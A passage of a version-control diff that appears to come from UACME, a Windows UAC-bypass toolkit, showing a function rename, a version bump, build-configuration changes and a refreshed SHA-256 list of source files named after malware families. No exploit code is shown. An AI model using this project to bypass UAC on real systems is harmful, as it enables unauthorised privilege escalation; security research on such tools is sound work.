return pi1.hProcess;
}
@ -491,7 +491,7 @@ VOID NTAPI supxLdrEnumModulesCallback(
}
/*
* ucmMasqueradeProcess
* supMasqueradeProcess
*
* Purpose:
*

4
Source/Akagi/sup.h
View File

@ -4,9 +4,9 @@
*
* TITLE: SUP.H
*
* VERSION: 2.10
* VERSION: 2.20
*
* DATE: 16 Apr 2016
* DATE: 25 May 2016
*
* Common header file for the program support routines.
*

7
Source/Akagi/uacme.vcxproj
View File

@ -159,6 +159,8 @@
<MultiProcessorCompilation>true</MultiProcessorCompilation>
<EnablePREfast>true</EnablePREfast>
<DebugInformationFormat>None</DebugInformationFormat>
<StringPooling>
</StringPooling>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -181,7 +183,7 @@
<WarningLevel>Level4</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>MinSpace</Optimization>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
@ -191,6 +193,8 @@
<CompileAs>CompileAsC</CompileAs>
<MultiProcessorCompilation>true</MultiProcessorCompilation>
<EnablePREfast>true</EnablePREfast>
<StringPooling>
</StringPooling>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -244,6 +248,7 @@
<ClInclude Include="gootkit.h" />
<ClInclude Include="hybrids.h" />
<ClInclude Include="makecab.h" />
<ClInclude Include="manifest.h" />
<ClInclude Include="modules\fubuki32.h" />
<ClInclude Include="modules\fubuki64.h" />
<ClInclude Include="modules\hibiki32.h" />

3
Source/Akagi/uacme.vcxproj.filters
View File

@ -155,6 +155,9 @@
<ClInclude Include="..\Shared\_filename.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="manifest.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="Resource.rc">

4
Source/Akagi/uacme.vcxproj.user
View File

@ -9,11 +9,11 @@
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LocalDebuggerCommandArguments>4</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>9</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LocalDebuggerCommandArguments>17</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>18</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
</Project>

53
UACME.sha256
View File

@ -1,7 +1,7 @@
a9e2c0f13b4bc6fa72012c9f8e0939d7a1d0a3d460d153db7856cba2fbfd2526 *Compiled\Akagi32.exe
81256a7e6a6d8aa30d545ec23d2580fc73904d4a6bb1195dd86b63975e30bd67 *Compiled\Akagi64.exe
bc65ed10e361d4e1b89e860fb56b1bde3b4bae870eb1f99c74f2c4b1c0cf28cf *Compiled\Akagi32.exe
c7dd892506f76db72ece9e10c4617fbc596b77c80a5e8c9f5469d745a0ee22b1 *Compiled\Akagi64.exe
8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf *Source\Akagi\akagi.ico
3241b62cfe41e54627454b48feab82a9b4c29faed8d331833eeb6c37d92fb792 *Source\Akagi\apphelp.h
270efb0d86f638f7978ceeeacdcd8addc793933b8915c193623c4e9efedfb05d *Source\Akagi\apphelp.h
0f2d310ed866ab1cb185bbef5f7c5bbc19367c8f544a5068ee8fadbfd00098ea *Source\Akagi\bin\fubuki32.cd
6659c4751eb6a4c7aba73b15017ee93d1cc96edbfd15c4062d263149db7d9d9e *Source\Akagi\bin\fubuki64.cd
b31d3f5c333e9d16d6523954194d0fff860f57f269cc17c1907b908ce02ba0f2 *Source\Akagi\bin\hibiki32.cd
@ -12,19 +12,20 @@ e07ad2d9cf2ef6f5802748255db25739fc48be2e293080309398ddaae5991578 *Source\Akagi\b
a38eae283e23c07ad8406cc84b4522f27713aea56b3b7f4d389e06873ae9f714 *Source\Akagi\bin32res.rc
b6169993a164dcd30a94e4ebc3ac4be813df21d8c08e1dc585735c71cb815df4 *Source\Akagi\bin64res.h
492f00c5e7cdd148a0a6944c696924989e998fca312a5745d2d6b4c1b66146b8 *Source\Akagi\bin64res.rc
e9a4b085c52b2d4f7244a3442050c775ae79682ddf326c5f7f9ea27ede380256 *Source\Akagi\carberp.c
cb56fc7890cafc2c43758be118547aa5535937539e0ef7fd409cc52ab995d4c4 *Source\Akagi\carberp.h
c109735dc00089240a6580dd52d462369d0d19e4ade2e05ed4b991b238cd63a3 *Source\Akagi\compress.c
cf3b9aae0aa2e3e72497138129e87ad89fd8f6f98fc05ee6b92883274f4a2cee *Source\Akagi\compress.h
cc73480e79661a514e3ff8cea2e1ba755bf3ad67c0e204234e73ad10b37ecd3b *Source\Akagi\consts.h
04dce8b539ee879bf161c59e16866d2ac632f816787d41028178a9e815637f1e *Source\Akagi\global.h
e5c9607c0650b61c08ab31288f6f6e80f8fdeab0dbbc1ac825364c35246ff32d *Source\Akagi\gootkit.c
2eccaba574c215e0004b4a1e28199cfba5cf1eed1c56defc075a14ec703968ea *Source\Akagi\gootkit.h
2b6b93a98f9b92d235088f74da92d39299db6ae44bf569530e891edafb9a6c8c *Source\Akagi\hybrids.c
b47e97c9c41f17ed4a8daf15873eebe9a736bf6a7021132045f459c445b536c2 *Source\Akagi\hybrids.h
a6afd5e939f9dd44fe9dd413a59b89358561e01aa07464a647f78de6f4c880b8 *Source\Akagi\main.c
076abfa6fc2da1ccff6b948600dcbcc6901e8c0323b0b06566dd189762cc9b73 *Source\Akagi\makecab.c
7f3868f4e4d0ae1b46a088feb21b292927e18bef8949a20be009f60c526ed802 *Source\Akagi\makecab.h
344261eacfb85f277fcca7f7f90c632df91e8b0aad681802b0deea8b7c23ffa7 *Source\Akagi\carberp.c
35ed70e08dc96bedc4d332edb36799fcee7fe8b743bce7b43a363aacfdb8dc78 *Source\Akagi\carberp.h
205676d0c84f9ea4d4c82039831a2fe0e0755653297fdc4767399bb2b495739b *Source\Akagi\compress.c
b1ecd94bff8c80b7eef48e0bb2f03b26f8c47ee2f014bda6d19f2aaa7259cb88 *Source\Akagi\compress.h
cb713c0c133da7c9b20c89ab347226242adb71585fd932dc7edc4689976cd4ff *Source\Akagi\consts.h
8bd4b3621f181f27499b66a06756bc49c036d0b6f5d2dff42136fa1cdd7ee2c3 *Source\Akagi\global.h
a34a7455461dc3dc684ea40be19700ffeb071bae44683c3ebf652c4609d6846a *Source\Akagi\gootkit.c
c37113f14c181533280441de1199cc511c7b35a42ceea3b9c0e671da7140d6fa *Source\Akagi\gootkit.h
2914a40311d3e0cad52e1c07df3db168118b582f2d143e5d589ccbee4bfb96e8 *Source\Akagi\hybrids.c
4560e753f5f254e5009e31a8b7faf07814a6aceecb84b4cfb15ecefd7b2d87a5 *Source\Akagi\hybrids.h
9f995fcac42a5955e193214f87995e4e1b166c5b7db485173291ac1936ba7035 *Source\Akagi\main.c
29d24f8cafcbbf7b37d626aaf2f56927e12aed78f6eef9bade17330d681a84cb *Source\Akagi\makecab.c
4a335667650fe76a601c4285eac5eb42665d307c82ab78c267af8586e1f3ec1b *Source\Akagi\makecab.h
fecbc3fa929a5ac459c6056d5e5effb00fd16bd1312ca434f4bc064764394429 *Source\Akagi\manifest.h
51b5716eab6cc404742ce06de2f2f0108c1329bf3f9ad4e097f6255e61f20cd5 *Source\Akagi\modules\fubuki32.h
df20c2a62168ebe57cbc8fa659076f2c884f28977149ae9614f6082d54b2c4c8 *Source\Akagi\modules\fubuki64.h
fd7c211058b4301a23951bd9414f479ca4ba58be7f2b689723c2d9be9185c99b *Source\Akagi\modules\hibiki32.h
@ -32,17 +33,17 @@ a6668312cdb6c961b80352fa8363156a4ac61ca145e41cebf4e180dd4d158a9f *Source\Akagi\m
c03ce07425d50b1c17ae76bfe7326f1c6c33be5e71efc5d6bcf39f08cd87a597 *Source\Akagi\modules\inazuma32.h
856e86be57f6bee70363b78f482770bee288d26de5a15602cbd0e9cfe540f10f *Source\Akagi\modules\kongou32.h
3d3e06b4f6b13bd52f298b8c58a2399db538a45a123dd9878034a48e5f35848c *Source\Akagi\modules\kongou64.h
97f57138369ba94382ea3220e7496ae512abfcd1c407f4b7147a578dd8e99f22 *Source\Akagi\pitou.c
1678721747c4a2844693ed2daa929e6c052996222360e0496274c62b83131652 *Source\Akagi\pitou.h
8c1eb4d1de2bed108bed68ac3c5e83b9c94fdf5407cac396da7e8290a1d2c7e3 *Source\Akagi\pitou.c
59282c82fe671eb7e56e98e0d1aa0f502302d5c3855026669c2fc187598a6ff5 *Source\Akagi\pitou.h
c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
a109a75339e2cb4dbda80b5027c2a556e72bbdbf169e2d114b4b75e78589edbc *Source\Akagi\Resource.rc
7780536158ae5764604547933702e6ae55fb68082a38e42b840d97b1b994151f *Source\Akagi\simda.c
7176f57736c148f7ff7d205fbea239b9d2f027b252be9d3970b0446864418aea *Source\Akagi\simda.h
a246d6603f868512c7617eed3c77143d20543c183d117be27fe8d9067799c999 *Source\Akagi\sup.c
da8a91585c045297a6684eccfc53b6175415d2e78b6ca9e80619ca465a5a6cfb *Source\Akagi\sup.h
07b256eab59d4bd26aef85e4658cc566c32560a34c847a1269aa6a930dbaf7f4 *Source\Akagi\uacme.vcxproj
f02faa11bc8a68c69d0c4e393ae03bd62ba8f1ee10c7df81b814dbe96029849a *Source\Akagi\uacme.vcxproj.filters
815b92eaaaac90517c550cfc09148fdca67b5a236bbccc73274a52257e53eeb3 *Source\Akagi\uacme.vcxproj.user
c77a435eb30a44605ed88e21d3cfaeca5acafec1f28508cd3fc244184420622e *Source\Akagi\Resource.rc
d84490cd98b484bb0e8af241df7500efef502525ec7249aa6a5b6f850e2bac77 *Source\Akagi\simda.c
9d25bcd377d6bc86332ac613cd99362c9881302d403a3e4e1e8c93a266982b32 *Source\Akagi\simda.h
60d675a3edf26a09d5bfc767f839578b3538c2035ae28f7044fec185d8881a2b *Source\Akagi\sup.c
da25f86ded4291a3dbc008181f59e96fbe89b1db9cddfe974846a163e8951e48 *Source\Akagi\sup.h
a47736665b5e87106b401f0aed7fdf2d05b298742a75fceb0328c8b54e6e08ed *Source\Akagi\uacme.vcxproj
29ac59ea3080e13dc3b5e5cb8b69643c9292cbf8ab943bf4fd607f0f34c87c45 *Source\Akagi\uacme.vcxproj.filters
b6af639d2439f411adbd77cdcad074d4d708d95aac9774b4649be0d3826b856c *Source\Akagi\uacme.vcxproj.user
31b7ed2f244ee5c9a8d5a62c6490de06073ec7eaf2f05c1861fc361cb2ab4aaf *Source\Fubuki\dll.vcxproj
605e3fa54f5d57215c9949bd4d25b5ca53db74228bb4aac0be177f9ccbb4b757 *Source\Fubuki\dll.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Fubuki\dll.vcxproj.user